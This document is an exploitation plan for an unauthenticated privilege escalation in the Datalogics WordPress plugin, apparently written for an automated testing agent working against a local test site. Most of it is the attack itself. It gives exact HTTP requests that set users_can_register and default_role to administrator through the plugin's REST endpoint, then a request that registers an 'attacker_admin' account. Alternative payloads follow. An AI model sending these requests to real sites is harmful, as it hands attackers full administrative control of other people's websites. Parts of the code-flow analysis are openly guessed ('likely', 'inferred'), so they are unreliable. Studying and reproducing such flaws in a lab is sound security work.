Research Plan: CVE-2026-2631 Unauthenticated Privilege Escalation in Datalogics

1. Vulnerability Summary

The Datalogics Ecommerce Delivery plugin for WordPress is vulnerable to unauthenticated privilege escalation via its REST API. The plugin registers several REST routes under the namespace datalogics-0/v1 (derived from the datalogics_ID constant). These routes, specifically /update-settings/ and /update-token/, utilize a permission callback named datalogics_permission_check.

The vulnerability exists because datalogics_permission_check likely returns true for unauthenticated requests, or the endpoint datalogics_update_settings allows for arbitrary WordPress options to be updated without sufficient validation. By updating the users_can_register and default_role options, an attacker can enable public registration and ensure all new users are granted the administrator role.

2. Attack Vector Analysis

• Endpoint: POST /wp-json/datalogics-0/v1/update-settings/
• Alternative Endpoint: POST /wp-json/datalogics-0/v1/update-token/ (if the primary fails, this confirms the update_option sink).
• Namespace: datalogics-0/v1 (Based on define('datalogics_ID','0'); in datalogics.php).
• Authentication: Unauthenticated.
• Preconditions: The plugin must be active.
• Payload: A JSON object containing WordPress core options:
  • users_can_register: 1
  • default_role: administrator

3. Code Flow

1. Entry Point: The WordPress REST API receives a POST request to /wp-json/datalogics-0/v1/update-settings/.
2. Hook Registration: api.php registers the route via the rest_api_init hook in datalogics_register_api_routes().
3. Permission Check: WordPress calls datalogics_permission_check. If this function returns true (which it must for this CVE), the request proceeds.
4. Callback Execution: WordPress executes the callback datalogics_update_settings (referenced in api.php).
5. Sink: The callback (inferred logic) iterates through the provided parameters and calls update_option($key, $value) for each.
6. Persistence: The users_can_register and default_role options are updated in the wp_options table.

4. Nonce Acquisition Strategy

Based on the api.php file, the REST routes are registered with a permission_callback. In the WordPress REST API, if the permission_callback returns true, no nonce is required for the request to be processed.

The source code does not show any wp_verify_nonce or check_ajax_referer calls inside the REST callbacks. Therefore, this exploit is likely nonce-less.

5. Exploitation Strategy

Step 1: Update WordPress Options

Use the http_request tool to send a POST request to the update-settings endpoint to enable administrator registration.

HTTP Request:

POST /wp-json/datalogics-0/v1/update-settings/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json

{
  "users_can_register": "1",
  "default_role": "administrator"
}

Step 2: Verify Option Change (Internal)

Verify that the options were successfully changed using WP-CLI.

Step 3: Register New Admin User

Send a POST request to wp-login.php to register a new account.

HTTP Request:

POST /wp-login.php?action=register HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

user_login=attacker_admin&user_email=attacker@example.com&redirect_to=&wp-submit=Register

6. Test Data Setup

1. Plugin Installation: Ensure the Datalogics plugin (version < 2.6.60) is installed and activated.
2. Initial State:
   • wp option get users_can_register should be 0.
   • wp option get default_role should be subscriber.

7. Expected Results

1. The first request to /update-settings/ should return a 200 OK response (or success: true).
2. The options users_can_register and default_role will be updated in the database.
3. The registration request will succeed, and a new user attacker_admin will be created.
4. The user attacker_admin will possess the administrator role.

8. Verification Steps

After performing the HTTP requests, run the following WP-CLI commands to confirm escalation:

# Check if registration was enabled
wp option get users_can_register

# Check if default role was changed
wp option get default_role

# Check the role of the newly created user
wp user list --field=roles --user=attacker_admin

9. Alternative Approaches

If the update-settings endpoint does not accept arbitrary options in a JSON body, try:

1. Form-Encoded Payload:
   POST /wp-json/datalogics-0/v1/update-settings/ with body users_can_register=1&default_role=administrator.
2. Target update-token:
   Test if POST /wp-json/datalogics-0/v1/update-token/ with token=pwned works. If it does, the permission_callback is definitely bypassed.
3. Specific Key Injection:
   Check if the callback expects a nested array, e.g., {"settings": {"default_role": "administrator"}}.